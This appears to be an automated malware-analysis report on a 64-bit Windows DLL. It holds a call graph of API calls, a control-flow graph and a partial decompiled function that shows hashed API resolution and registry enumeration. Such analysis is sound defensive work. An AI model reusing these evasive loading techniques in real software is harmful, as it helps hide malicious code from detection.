calls 4825->4826 4827 180008dc8 4826->4827 4828 1800090ee 4827->4828 4829 180008df9 lstrlenA HeapAlloc 4827->4829 4848 180008f3e HeapFree 4827->4848 4828->4747 4831 180008e20 memcpy 4829->4831 4829->4848 4833 180008e3c 4831->4833 4832 180008f85 4834 180002370 2 API calls 4832->4834 4836 180008e50 lstrlenA HeapAlloc 4833->4836 4841 180008e7b 4833->4841 4835 180008fa3 4834->4835 4835->4828 4840 180002370 2 API calls 4835->4840 4836->4841 4837 180008eda 4856 18000958c EnterCriticalSection 4837->4856 4838 180008f4f HeapFree 4838->4848 4843 180008ff3 4840->4843 4841->4837 4841->4838 4845 18000905e 4843->4845 4849 18000958c 2 API calls 4843->4849 4846 180002370 2 API calls 4845->4846 4853 18000907d 4846->4853 4847 180008f1d HeapFree HeapFree 4847->4848 4848->4828 4848->4832 4850 180009018 memcpy 4849->4850 4851 180009043 LeaveCriticalSection HeapFree 4850->4851 4852 18000902f memset 4850->4852 4851->4845 4852->4851 4853->4828 4854 18000958c 2 API calls 4853->4854 4855 1800090b2 GetSystemTimeAsFileTime LeaveCriticalSection 4854->4855 4855->4828 4857 1800095a2 Sleep 4856->4857 4858 180008eeb LeaveCriticalSection 4856->4858 4857->4857 4857->4858 4858->4847 4858->4848 4860 180009514 4859->4860 4863 180009550 4859->4863 4861 18000951c HeapAlloc 4860->4861 4860->4863 4862 180009534 memcpy 4861->4862 4861->4863 4862->4863 4863->4752 4865 180001cec EnterCriticalSection 4864->4865 4866 180001d7d 4864->4866 4867 180001d0c 4865->4867 4871 180008034 EnterCriticalSection LeaveCriticalSection HeapAlloc 4866->4871 4868 180001d74 LeaveCriticalSection 4867->4868 4869 180001d14 HeapAlloc 4867->4869 4868->4866 4870 180001d2a 4869->4870 4870->4868 4872 180007e3c 4871->4872 4873 1800080aa memset EnterCriticalSection 4871->4873 4872->4767 4876 18000970c 4872->4876 4874 180008111 LeaveCriticalSection 4873->4874 4875 1800080d5 4873->4875 4874->4872 4875->4874 4877 180009751 4876->4877 4878 180009758 EnterCriticalSection LeaveCriticalSection 4876->4878 4879 1800045e8 4 API calls 4877->4879 4880 1800097d1 4878->4880 4884 18000977f 4878->4884 4879->4878 4881 180007ec3 HeapFree 4880->4881 4930 180006108 HeapAlloc 4880->4930 4881->4775 4881->4782 4885 180001c00 4 API calls 4884->4885 4885->4880 4886 180009833 EnterCriticalSection LeaveCriticalSection 4888 180009866 4886->4888 4889 18000985f 4886->4889 4887 18000995c HeapFree 4887->4881 4891 180009882 lstrlenA lstrlenA 4888->4891 4892 18000993c HeapFree HeapFree 4888->4892 4890 180001c00 4 API calls 4889->4890 4890->4888 4893 180001c00 4 API calls 4891->4893 4892->4887 4894 1800098a7 4893->4894 4895 18000992e HeapFree 4894->4895 4896 1800098af memcpy 4894->4896 4895->4892 4942 1800088b4 4896->4942 4901 180002446 4900->4901 4903 1800023e6 4900->4903 4901->4782 4902 1800023eb EnterCriticalSection 4902->4903 4903->4901 4903->4902 4904 180002421 LeaveCriticalSection 4903->4904 4904->4903 4905 18000242f HeapFree 4904->4905 4905->4903 4907 180009a3e 4906->4907 4908 180007f30 4907->4908 4909 1800094e0 2 API calls 4907->4909 4908->4768 4908->4785 4910 180009a73 4909->4910 4910->4908 4911 180009aa4 4910->4911 5225 1800081f0 4910->5225 4913 180009b36 memset HeapFree 4911->4913 5230 180006eb0 4911->5230 4913->4908 4916 180009b16 4918 180009b1b memset HeapFree 4916->4918 4917 180009ae8 memcpy HeapFree 4917->4918 4918->4913 4920 18000958c 2 API calls 4919->4920 4921 18000460b 4920->4921 4922 180004616 GetSystemTimeAsFileTime 4921->4922 4923 18000462c LeaveCriticalSection 4921->4923 4922->4923 4923->4771 4926 180008be1 EnterCriticalSection 4925->4926 4927 180008c2e 4925->4927 4928 180008c14 LeaveCriticalSection 4926->4928 4927->4777 4928->4927 4931 180006163 4930->4931 4932 18000627d 4930->4932 4933 1800061ec 4931->4933 4953 180006008 lstrlenA HeapAlloc 4931->4953 4958 180006344 Sleep GetSystemTimeAsFileTime 4931->4958 4932->4886 4932->4887 4934 180006222 4933->4934 4989 180007444 GetSystemTimeAsFileTime _snprintf 4933->4989 4936 18000626f HeapFree 4934->4936 4938 180006240 HeapFree 4934->4938 4941 18000625a HeapFree 4934->4941 4936->4932 4938->4934 4941->4934 4943 1800088e9 4942->4943 4944 1800088ec memset 4942->4944 4943->4944 5096 180005448 4944->5096 4946 180008965 5146 180003e58 4946->5146 4949 180008955 4949->4946 5130 180003fcc 4949->5130 4954 180006069 _snprintf 4953->4954 4955 1800060e5 4953->4955 4954->4955 4956 1800060c7 lstrcpyA 4954->4956 4955->4931 4956->4955 4959 1800063a7 4958->4959 5000 1800066a8 4959->5000 4961 1800063d2 4962 1800063e3 lstrlenA lstrlenA HeapAlloc 4961->4962 4963 1800061b8 HeapFree 4961->4963 4964 180006671 HeapFree 4962->4964 4965 180006417 lstrcpyA 4962->4965 4963->4931 4963->4933 4964->4963 4966 180006456 4965->4966 4967 18000642f 4965->4967 5004 1800031d4 4966->5004 4967->4966 4968 180006434 lstrcatA lstrcatA 4967->4968 4968->4966 4971 180006663 HeapFree 4971->4964 4972 18000646e lstrlenA HeapAlloc 4973 180006650 HeapFree 4972->4973 4974 1800064ad 4972->4974 4980 18000665e 4973->4980 4975 1800066a8 3 API calls 4974->4975 4976 1800064e2 4975->4976 4977 180006642 HeapFree 4976->4977 4978 1800064f0 _snprintf HeapFree 4976->4978 4977->4973 4979 180006531 4978->4979 4978->4980 4979->4980 5021 180001208 4979->5021 4980->4971 4983 180006562 HeapAlloc 4983->4977 4984 180006589 4983->4984 4985 1800066a8 3 API calls 4984->4985 4986 1800065be 4985->4986 4987 180006634 HeapFree 4986->4987 4988 1800065c8 _snprintf _snprintf HeapFree 4986->4988 4987->4977 4988->4971 4990 1800074fc HeapAlloc 4989->4990 4997 1800074c8 4989->4997 4991 180007526 _snprintf HeapAlloc 4990->4991 4992 180007659 4990->4992 4993 18000764b HeapFree 4991->4993 4996 180007561 4991->4996 4992->4934 4993->4992 4994 1800074d7 lstrlenA 4994->4997 4995 180007603 _snprintf 4995->4992 4996->4995 4998 180007590 _snprintf memcpy memcpy 4996->4998 4997->4990 4997->4994 4998->4998 4999 1800075f9 4998->4999 4999->4995 5001 1800066e8 HeapAlloc 5000->5001 5002 1800066cf Sleep GetSystemTimeAsFileTime 5000->5002 5003 1800066ff 5001->5003 5002->5001 5003->4961 5032 180006a84 5004->5032 5007 180003391 5007->4971 5007->4972 5008 18000321e lstrlenA HeapAlloc 5009 180003383 HeapFree 5008->5009 5010 180003250 memcpy lstrcpyA lstrlenA 5008->5010 5009->5007 5011 180001208 14 API calls 5010->5011 5012 180003294 HeapFree 5011->5012 5012->5009 5013 1800032ac 5012->5013 5044 18000467c 5013->5044 5016 180003365 HeapFree HeapFree 5016->5009 5017 1800032f8 HeapAlloc 5018 180003324 UrlEscapeA 5017->5018 5019 180003341 5017->5019 5018->5019 5020 180003350 HeapFree 5018->5020 5019->5016 5020->5016 5022 180001249 5021->5022 5027 1800012d4 5021->5027 5023 180001252 EnterCriticalSection LeaveCriticalSection 5022->5023 5022->5027 5071 180009994 5023->5071 5026 180001292 HeapAlloc 5026->5027 5028 1800012aa 5026->5028 5027->4977 5027->4983 5029 180009994 10 API calls 5028->5029 5030 1800012ce 5029->5030 5030->5027 5031 1800012e8 HeapFree 5030->5031 5031->5027 5053 18000702c 5032->5053 5034 180006ac3 5035 1800066a8 3 API calls 5034->5035 5036 180006b20 5035->5036 5037 180003212 5036->5037 5038 1800066a8 3 API calls 5036->5038 5037->5007 5037->5008 5039 180006b34 5038->5039 5040 180006b3c HeapAlloc 5039->5040 5041 180006b7e HeapFree 5039->5041 5042 180006b54 5040->5042 5043 180006b70 HeapFree 5040->5043 5041->5037 5042->5043 5043->5041 5066 1800039a0 5044->5066 5047 1800046c5 HeapAlloc 5048 1800046e0 5047->5048 5052 1800032d0 5047->5052 5049 1800039a0 2 API calls 5048->5049 5050 1800046f3 5049->5050 5051 180004716 HeapFree 5050->5051 5050->5052 5051->5052 5052->5016 5052->5017 5054 18000459c SetLastError 5053->5054 5055 180007053 5054->5055 5056 18000707a 5055->5056 5057 1800070ce GetLastError 5055->5057 5058 18000459c SetLastError 5056->5058 5065 1800070be 5057->5065 5059 180007088 5058->5059 5062 1800070a4 5059->5062 5063 1800070a8 GetLastError 5059->5063 5060 180004cfc Sleep GetSystemTimeAsFileTime 5061 1800070e7 5060->5061 5061->5034 5064 18000459c SetLastError 5062->5064 5063->5062 5064->5065 5065->5060 5065->5061 5067 18000459c SetLastError 5066->5067 5068 1800039d9 5067->5068 5069 180003a05 5068->5069 5070 1800039fd GetLastError 5068->5070 5069->5047 5069->5052 5070->5069 5072 1800099a2 5071->5072 5073 18000128b 5072->5073 5075 180004a14 5072->5075 5073->5026 5073->5027 5076 18000459c SetLastError 5075->5076 5077 180004a54 5076->5077 5078 180004a7f 5077->5078 5079 180004c20 GetLastError 5077->5079 5080 180006d04 SetLastError memcpy memset GetLastError 5078->5080 5087 180004c10 5079->5087 5081 180004a9e 5080->5081 5082 180004bf6 5081->5082 5083 180004aa8 memset 5081->5083 5085 18000459c SetLastError 5082->5085 5084 18000459c SetLastError 5083->5084 5086 180004aca 5084->5086 5085->5087 5088 180004ae9 GetLastError 5086->5088 5091 180004af9 5086->5091 5087->5073 5088->5082 5088->5091 5089 180004afd memcpy 5089->5091 5090 18000459c SetLastError 5090->5091 5091->5089 5091->5090 5092 180004bd6 GetLastError 5091->5092 5093 180004bb0 memcpy 5091->5093 5094 180004bde 5092->5094 5093->5091 5093->5094 5095 18000459c SetLastError 5094->5095 5095->5082 5097 180005486 5096->5097 5101 180005496 5096->5101 5162 180004dd0 lstrlenA HeapAlloc 5097->5162 5102 18000549a 5101->5102 5173 1800027d4 5101->5173 5102->4946 5102->4949 5110 180005df8 5102->5110 5103 1800054e2 5103->5102 5105 18000459c SetLastError 5103->5105 5106 180005511 5105->5106 5205 180003798 5106->5205 5109 180005545 HeapFree 5109->5102 5111 180005e31 5110->5111 5122 180005fad 5110->5122 5112 18000459c SetLastError 5111->5112 5113 180005e47 5112->5113 5114 180005fb4 GetLastError 5113->5114 5115 18000459c SetLastError 5113->5115 5114->5122 5116 180005e70 5115->5116 5116->5114 5117 180005ea9 5116->5117 5118 18000459c SetLastError 5117->5118 5119 180005ec1 HeapAlloc 5118->5119 5121 180005f0a 5119->5121 5119->5122 5123 18000459c SetLastError 5121->5123 5122->4949 5124 180005f18 5123->5124 5125 180005f95 GetLastError 5124->5125 5126 180005f4b HeapAlloc 5124->5126 5129 180005f9d HeapFree 5125->5129 5127 180005f75 wcstombs 5126->5127 5128 180005f8e 5126->5128 5127->5129 5128->5129 5129->5122 5131 18000459c SetLastError 5130->5131 5132 180003ffc 5131->5132 5133 180004151 GetLastError 5132->5133 5134 180004018 5132->5134 5136 18000412f 5133->5136 5135 18000403c HeapAlloc 5134->5135 5134->5136 5135->5136 5144 180004059 5135->5144 5136->4946 5137 1800040b7 GetLastError 5138 1800040bf WaitForSingleObject 5137->5138 5139 18000410b 5138->5139 5138->5144 5140 180004110 HeapFree 5139->5140 5140->5136 5142 180004122 5140->5142 5141 18000459c SetLastError 5141->5144 5219 1800085e4 5142->5219 5144->5137 5144->5138 5144->5140 5144->5141 5145 180004101 GetLastError 5144->5145 5145->5140 5147 180003e7f 5146->5147 5153 180003e8d 5146->5153 5148 18000459c SetLastError 5147->5148 5148->5153 5149 18000459c SetLastError 5150 180003ead 5149->5150 5154 18000459c SetLastError 5150->5154 5157 180003ecd 5150->5157 5151 180003ee1 HeapFree 5152 180003eec 5151->5152 5155 180003ef5 HeapFree 5152->5155 5156 180003f00 5152->5156 5153->5149 5153->5150 5154->5157 5155->5156 5158 180003f14 5156->5158 5159 180003f09 HeapFree 5156->5159 5157->5151 5157->5152 5160 180003f28 HeapFree 5158->5160 5161 180003f1d HeapFree 5158->5161 5159->5158 5160->4895 5161->5160 5163 180004e26 HeapAlloc 5162->5163 5172 180004e9c 5162->5172 5164 180004ea9 HeapFree 5163->5164 5165 180004e3c 5163->5165 5164->5172 5215 180004994 5165->5215 5167 180004e5f 5169 180004e6d memcpy lstrcpyA 5167->5169 5170 180004e8e lstrcpyA 5167->5170 5169->5172 5170->5172 5171 180004994 strchr 5171->5167 5172->5101 5174 180007b04 3 API calls 5173->5174 5177 180002815 5174->5177 5175 180002a78 GetLastError 5176 180002a5d 5175->5176 5176->5102 5176->5103 5201 180007b04 lstrlenA HeapAlloc 5176->5201 5177->5175 5178 18000459c SetLastError 5177->5178 5179 180002854 HeapFree 5178->5179 5179->5175 5181 180002890 5179->5181 5182 18000459c SetLastError 5181->5182 5184 1800028a7 5181->5184 5182->5184 5183 180007b04 3 API calls 5185 1800028d9 5183->5185 5184->5175 5184->5183 5185->5175 5186 18000459c SetLastError 5185->5186 5187 18000290f 5185->5187 5186->5187 5188 18000459c SetLastError 5187->5188 5189 18000294c HeapFree 5188->5189 5189->5175 5191 180002982 5189->5191 5192 180007b04 3 API calls 5191->5192 5193 18000298d 5192->5193 5193->5175 5194 18000459c SetLastError 5193->5194 5195 1800029a7 HeapFree 5194->5195 5195->5175 5197 180002a08 5195->5197 5198 18000459c SetLastError 5197->5198 5199 180002a1f 5198->5199 5199->5176 5200 18000459c SetLastError 5199->5200 5200->5176 5202 180007b54 5201->5202 5203 180007b76 5201->5203 5204 180007b62 memset 5202->5204 5203->5103 5204->5203 5210 1800037d2 5205->5210 5206 18000459c SetLastError 5206->5210 5207 180003823 GetLastError 5207->5210 5208 18000388c 5209 1800038dc 5208->5209 5211 18000459c SetLastError 5208->5211 5209->5102 5209->5109 5210->5206 5210->5207 5210->5208 5210->5209 5214 180003884 GetLastError 5210->5214 5212 1800038ac 5211->5212 5212->5209 5213 1800038d4 GetLastError 5212->5213 5213->5209 5214->5208 5216 1800095bc 5215->5216 5217 1800049ab strchr 5216->5217 5218 1800049c0 5217->5218 5218->5167 5218->5171 5220 18000861b 5219->5220 5221 18000868b 5220->5221 5222 180008623 HeapAlloc 5220->5222 5221->5136 5222->5221 5223 18000863a 5222->5223 5223->5221 5224 18000867b HeapFree 5223->5224 5224->5221 5226 18000823c 5225->5226 5229 1800082db 5225->5229 5227 18000826a HeapAlloc 5226->5227 5226->5229 5228 180008286 memset memcpy memcpy 5227->5228 5227->5229 5228->5229 5229->4911 5231 180006ef8 5230->5231 5232 180006fe7 5231->5232 5233 180006f12 HeapAlloc 5231->5233 5232->4916 5232->4917 5233->5232 5234 180006f2f 5233->5234 5242 180006bac 5234->5242 5237 180007003 HeapFree 5237->5232 5238 180004a14 10 API calls 5239 180006fbc 5238->5239 5239->5237 5240 180002594 2 API calls 5239->5240 5241 180006fd6 5240->5241 5241->5232 5241->5237 5243 180006be3 5242->5243 5244 180006bd9 5242->5244 5248 18000a5a0 5243->5248 5244->5237 5244->5238 5247 180006c49 memcpy memset 5247->5244 5259 18000118c 5248->5259 5251 18000118c memset 5252 18000a5f9 5251->5252 5253 18000118c memset 5252->5253 5254 18000a613 5253->5254 5255 180006bfa 5254->5255 5263 180001eec memcpy 5254->5263 5255->5244 5255->5247 5257 18000a686 5258 18000a6a3 memset memset 5257->5258 5258->5255 5262 1800011aa 5259->5262 5260 1800011e6 memset 5261 1800011fb 5260->5261 5261->5251 5262->5260 5262->5261 5271 180003934 5263->5271 5265 180001f5b 5266 180003934 9 API calls 5265->5266 5267 180001f80 memset 5266->5267 5269 180001f9a 5267->5269 5268 180002081 memcpy memset memset 5268->5257 5269->5268 5270 180003934 9 API calls 5269->5270 5270->5269 5272 1800095c4 memset memcpy memset 5271->5272 5273 180003960 5272->5273 5274 180006298 memset memset memset memset memset 5273->5274 5275 180003978 memset 5274->5275 5275->5265 5277 18000588b 5276->5277 5278 18000578d 5276->5278 5279 180005896 WaitForSingleObject 5277->5279 5283 1800058ec 5277->5283 5278->5277 5280 180005861 5278->5280 5281 1800057a3 5278->5281 5279->5283 5282 1800024cc 2 API calls 5280->5282 5287 1800057dd 5280->5287 5281->5280 5281->5283 5286 1800057c4 5281->5286 5299 180005938 5281->5299 5296 180005875 5282->5296 5283->5287 5290 180005914 memset 5283->5290 5283->5299 5284 1800015ea HeapFree 5284->4792 5285 18000599a 5285->5287 5321 180001a88 HeapAlloc 5285->5321 5286->5280 5289 1800057cf 5286->5289 5287->5284 5325 180005600 lstrlenA HeapAlloc 5287->5325 5288 180007950 13 API calls 5292 180005988 HeapFree 5288->5292 5293 180005852 SetEvent 5289->5293 5294 1800057d6 5289->5294 5308 1800020dc lstrlenA memset HeapAlloc 5290->5308 5292->5285 5293->5287 5294->5287 5305 1800024cc HeapAlloc 5294->5305 5296->5287 5297 180002668 7 API calls 5296->5297 5304 18000581b 5297->5304 5299->5285 5299->5287 5299->5288 5301 18000582e HeapFree 5301->5287 5303 180002668 7 API calls 5303->5304 5304->5287 5304->5301 5306 180002511 5305->5306 5307 1800024ff memcpy 5305->5307 5306->5287 5306->5303 5307->5306 5309 180002163 memcpy 5308->5309 5310 180002287 5308->5310 5311 18000217d 5309->5311 5310->5299 5312 18000459c SetLastError 5311->5312 5313 180002279 HeapFree 5311->5313 5314 1800021e9 5312->5314 5313->5310 5315 18000459c SetLastError 5314->5315 5320 180002235 5314->5320 5316 18000220b 5315->5316 5319 18000459c SetLastError 5316->5319 5316->5320 5317 18000459c SetLastError 5318 180002272 5317->5318 5318->5313 5319->5320 5320->5313 5320->5317 5322 180001ad2 memset 5321->5322 5323 180001b1c 5321->5323 5330 180003a24 5322->5330 5323->5287 5326 18000565a GetSystemTime _snprintf EnterCriticalSection 5325->5326 5327 18000572f 5325->5327 5328 1800056dc LeaveCriticalSection HeapFree 5326->5328 5327->5284 5328->5327 5331 180003a53 5330->5331 5332 180003a5b memcpy InitializeCriticalSection CreateEventA 5330->5332 5337 180007950 13 API calls 5331->5337 5333 180003bd6 GetLastError 5332->5333 5334 180003ada CreateEventA 5332->5334 5333->5331 5335 180003bfc 5333->5335 5334->5333 5336 180003af8 CreateMutexA 5334->5336 5335->5323 5336->5333 5338 180003b1a 5336->5338 5339 180003bea 5337->5339 5340 180001c00 4 API calls 5338->5340 5339->5335 5342 18000459c SetLastError 5339->5342 5341 180003b24 5340->5341 5343 18000459c SetLastError 5341->5343 5342->5335 5344 180003b35 5343->5344 5345 18000459c SetLastError 5344->5345 5351 180003b90 5344->5351 5349 180003b66 5345->5349 5348 180003bcc SwitchToThread 5348->5335 5349->5333 5350 18000459c SetLastError 5349->5350 5350->5351 5351->5333 5352 180006c8c 5351->5352 5353 18000459c SetLastError 5352->5353 5354 180003bc3 5353->5354 5354->5333 5354->5348 5356 180008326 5355->5356 5357 18000799c 5355->5357 5358 18000459c SetLastError 5356->5358 5357->4802 5357->4803 5359 180008334 5358->5359 5360 18000459c SetLastError 5359->5360 5360->5357 5373 180003e14 5374 18000459c SetLastError 5373->5374 5375 180003e29 5374->5375 5468 18000a494 5469 18000a4a0 5468->5469 5472 18000a6ec 5469->5472 5473 18000a76b RaiseException 5472->5473 5478 18000a790 5472->5478 5475 18000a4df 5473->5475 5474 18000a824 LoadLibraryA 5476 18000a837 GetLastError 5474->5476 5477 18000a88f 5474->5477 5481 18000a84d 5476->5481 5482 18000a85f RaiseException 5476->5482 5483 18000a8cb FreeLibrary 5477->5483 5484 18000a89b 5477->5484 5478->5474 5478->5475 5478->5477 5479 18000a8b4 5478->5479 5479->5475 5480 18000a92b GetProcAddress 5479->5480 5480->5475 5485 18000a941 GetLastError 5480->5485 5481->5477 5481->5482 5482->5475 5483->5479 5484->5479 5486 18000a8a1 LocalAlloc 5484->5486 5487 18000a957 5485->5487 5486->5479 5487->5475 5488 18000a969 RaiseException 5487->5488 5488->5475 5508 18000a519 5509 18000a525 5508->5509 5510 18000a6ec 9 API calls 5509->5510 5511 18000a564 5510->5511 5461 180007a7c 5462 180007ab9 5461->5462 5463 180007a9d TerminateProcess CloseHandle CloseHandle 5461->5463 5464 180007ad2 5462->5464 5465 180007ac2 CloseHandle CloseHandle 5462->5465 5463->5462 5466 180007aeb HeapFree 5464->5466 5467 180007adb CloseHandle CloseHandle 5464->5467 5465->5464 5467->5466 5512 18000431c WaitForSingleObject 5513 18000449d 5512->5513 5514 18000435d 5512->5514 5516 18000459c SetLastError 5513->5516 5515 18000459c SetLastError 5514->5515 5517 180004367 memcpy 5515->5517 5520 1800044a7 5516->5520 5531 180004386 5517->5531 5519 180004568 GetLastError 5523 180004570 ReleaseMutex 5519->5523 5520->5519 5522 18000459c SetLastError 5520->5522 5521 18000459c SetLastError 5521->5531 5524 1800044e0 5522->5524 5524->5519 5526 1800044fa SetEvent 5524->5526 5525 18000444d GetLastError 5525->5531 5534 180004504 5526->5534 5527 180004481 WaitForSingleObject 5529 180004498 5527->5529 5527->5531 5528 180004461 ResetEvent WaitForSingleObject 5528->5531 5529->5523 5530 180004435 GetLastError 5530->5527 5530->5531 5531->5521 5531->5525 5531->5527 5531->5528 5531->5530 5533 180008308 SetLastError 5531->5533 5536 18000440c SetEvent 5531->5536 5539 180008150 5531->5539 5533->5531 5534->5519 5535 1800091f8 10 API calls 5534->5535 5538 18000459c SetLastError 5534->5538 5535->5534 5546 1800091f8 5536->5546 5538->5534 5555 180002a9c memset 5539->5555 5541 18000459c SetLastError 5543 180008181 5541->5543 5542 1800081c2 5544 1800081c0 5542->5544 5545 1800081c4 GetLastError 5542->5545 5543->5541 5543->5542 5543->5544 5544->5531 5545->5544 5547 180009221 5546->5547 5548 180009266 GetSystemTimeAsFileTime EnterCriticalSection LeaveCriticalSection 5547->5548 5554 180009322 5547->5554 5549 180006c8c SetLastError 5548->5549 5551 1800092d4 5549->5551 5550 180009331 5550->5531 5551->5550 5553 1800092e9 GetLastError EnterCriticalSection LeaveCriticalSection 5551->5553 5552 180002770 4 API calls 5552->5550 5553->5550 5553->5554 5554->5550 5554->5552 5556 180002b43 5555->5556 5557 180002ad7 lstrcpynA 5555->5557 5556->5543 5558 180002af6 5557->5558 5559 18000459c SetLastError 5558->5559 5560 180002b1a 5559->5560 5560->5556 5561 180002b39 GetLastError 5560->5561 5561->5556 5365 1331c6d 5367 1331c29 5365->5367 5366 1331c14 5367->5366 5368 1331c1e RtlAllocateHeap 5367->5368 5368->5366 5640 180007760 5641 1800077a6 5640->5641 5642 18000782b memcmp 5641->5642 5644 180007885 5641->5644 5643 180007844 5642->5643 5642->5644 5647 180007b04 3 API calls 5643->5647 5645 1800078b1 5644->5645 5646 180007890 memcmp 5644->5646 5648 1800078a9 5645->5648 5649 1800078b6 memcmp 5645->5649 5646->5648 5650 18000784f 5647->5650 5651 1800088b4 39 API calls 5648->5651 5649->5648 5652 180007909 5650->5652 5654 180001000 7 API calls 5650->5654 5651->5652 5653 180007914 5652->5653 5655 180007928 HeapFree 5652->5655 5656 180007870 HeapFree 5654->5656 5655->5653 5656->5652

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 18000508c-1800050da HeapAlloc 1 180005419 0->1 2 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 0->2 4 18000541e-18000543a 1->4 6 180005118-180005131 call 180007678 call 18000459c 2->6 7 18000540f-180005417 call 180005578 2->7 14 180005133-180005142 6->14 15 180005144 6->15 7->4 16 180005147-18000514e 14->16 15->16 17 18000515b-180005184 HeapAlloc 16->17 18 180005150-180005156 GetLastError 16->18 21 180005226 17->21 22 18000518a-1800051b0 RegOpenKeyW 17->22 20 180005408-18000540d 18->20 20->4 20->7 25 18000522b-18000522e 21->25 23 1800051b2-1800051b4 22->23 24 180005216-180005224 HeapFree 22->24 27 1800051cf-1800051ec RegEnumKeyW 23->27 24->25 25->7 26 180005234-180005280 memcpy call 180005ca4 25->26 35 180005282-18000529a call 180005ca4 26->35 36 18000529c-18000529f 26->36 29 1800051b6-1800051ca call 180009110 27->29 30 1800051ee-1800051f7 27->30 29->30 40 1800051cc 29->40 33 180005203-180005214 RegCloseKey 30->33 34 1800051f9-180005200 30->34 33->24 33->26 34->33 35->36 36->7 39 1800052a5-1800052b6 call 180006dcc 36->39 44 1800052e2-1800052e5 39->44 45 1800052b8-1800052cc call 180003c24 39->45 40->27 44->7 46 1800052eb-1800052ee call 180008708 44->46 45->44 51 1800052ce-1800052de call 180003c24 45->51 50 1800052f3-1800052f6 46->50 52 180005302-180005323 50->52 53 1800052f8-1800052fd 50->53 51->44 55 180005325-18000532d 52->55 56 180005339 52->56 53->7 58 18000533c-18000533f 55->58 59 18000532f-180005337 call 180004ed8 55->59 56->58 61 180005341-180005346 58->61 62 18000534b-180005355 58->62 59->58 61->7 64 180005357-18000535f 62->64 65 18000536e 62->65 66 180005371-180005374 64->66 67 180005361-18000536c call 180004ed8 64->67 65->66 66->61 69 180005376-180005391 GetModuleHandleA 66->69 67->66 71 180005393-1800053a7 call 18000459c 69->71 72 1800053fb-180005403 call 180002b60 69->72 76 1800053a9-1800053bc GetCurrentThreadId 71->76 77 1800053be 71->77 72->20 78 1800053c1-1800053c4 76->78 77->78 78->18 80 1800053ca-1800053db call 18000459c 78->80 83 1800053dd-1800053ec 80->83 84 1800053ee 80->84 85 1800053f1-1800053f4 83->85 84->85 85->4 87 1800053f6 85->87 87->18
                  C-Code - Quality: 54%
                  			E0000000118000508C(void* __eax, void* __ecx, void* __edi, void* __esi, void* __ebp, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* __r14;
                  				void* __r15;
                  				long _t56;
                  				long _t58;
                  				struct HINSTANCE__* _t70;
                  				void* _t73;
                  				long long* _t148;
                  				void* _t149;
                  				void* _t155;
                  				int _t190;
                  				long long _t191;
                  				int _t193;
                  				long long _t194;
                  				struct _CRITICAL_SECTION* _t200;
                  				void* _t203;
                  				void* _t204;
                  				signed short* _t213;
                  				void* _t216;
                  				void* _t217;
                  				long long _t218;
                  				void* _t219;
                  				long _t221;
                  				long _t225;
                  				void* _t227;
                  				intOrPtr _t228;
                  
                  				_t156 = __rbx;
                  				_t148 = __rax;
                  				 *((long long*)(_t203 + 0x20)) = __rbx;
                  				 *((long long*)(_t203 + 8)) = __rcx;
                  				_t204 = _t203 - 0x230;
                  				_t201 =  *0x8000d4a0;
                  				_t228 =  *0x8000d490;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t227, _t225, _t221);
                  				r12d = 0;
                  				_t191 = __rax;
                  				if (__rax == _t219) goto 0x80005419;
                  				memset(_t219, _t190, _t193);
                  				InitializeCriticalSection(_t200);
                  				_t5 = _t191 + 0x98; // 0x98
                  				_t218 = _t5;
                  				 *_t218 = _t218;
                  				 *((long long*)(__rax + 0xa0)) = _t218;
                  				if (E00000001180008B44(__esi, __rax - _t219, __rax, __rbx, _t193, __rbx, _t216, _t225, _t228) != r12d) goto 0x8000540f;
                  				E0000000118000459C(E00000001180007678(__ecx, __esi, E00000001180008B44(__esi, __rax - _t219, __rax, __rbx, _t193, __rbx, _t216, _t225, _t228) - r12d, __rax, _t156, __rax, _t193), 0xdc444c2b,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t148 == _t219) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t148();
                  				goto 0x80005147;
                  				_t149 = _t219;
                  				 *(_t191 + 0x28) = _t149;
                  				if (_t149 != _t219) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t194 =  *0x8000d4a0;
                  				if (_t194 == _t219) goto 0x80005226;
                  				 *_t194 = r12w; // executed
                  				_t56 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t56 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(_t56, __edi, _t156, _t194, _t204 + 0x20, _t194, _t204 + 0x278, _t216) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t58 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t58 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t58 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t194;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t195 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t204 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 8 - r12d, _t156, _t191, _t204 + 0x280, _t191,  *0x8000d490) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t62, E00000001180005CA4(8, 8 - r12d, _t156, _t191, _t204 + 0x280, _t191,  *0x8000d490) - r12d, _t156, _t191, _t204 + 0x280, _t191,  *0x8000d490) != r12d) goto 0x8000540f;
                  				_t28 = _t191 + 8; // 0x8
                  				if (E00000001180006DCC(0x7ffe0030, _t156, _t191, _t28, _t191,  *0x8000d490) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t156, _t191, _t191,  *0x8000d490,  *0x8000d4a0);
                  				 *((long long*)(_t191 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t219) goto 0x800052e2;
                  				_t30 = _t191 + 8; // 0x8
                  				E00000001180003C24(_t156, _t30, _t191, _t195,  *0x8000d4a0);
                  				 *((long long*)(_t191 + 0x38)) = 0x180000000;
                  				_t91 =  !=  ? r12d : 8;
                  				_t134 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
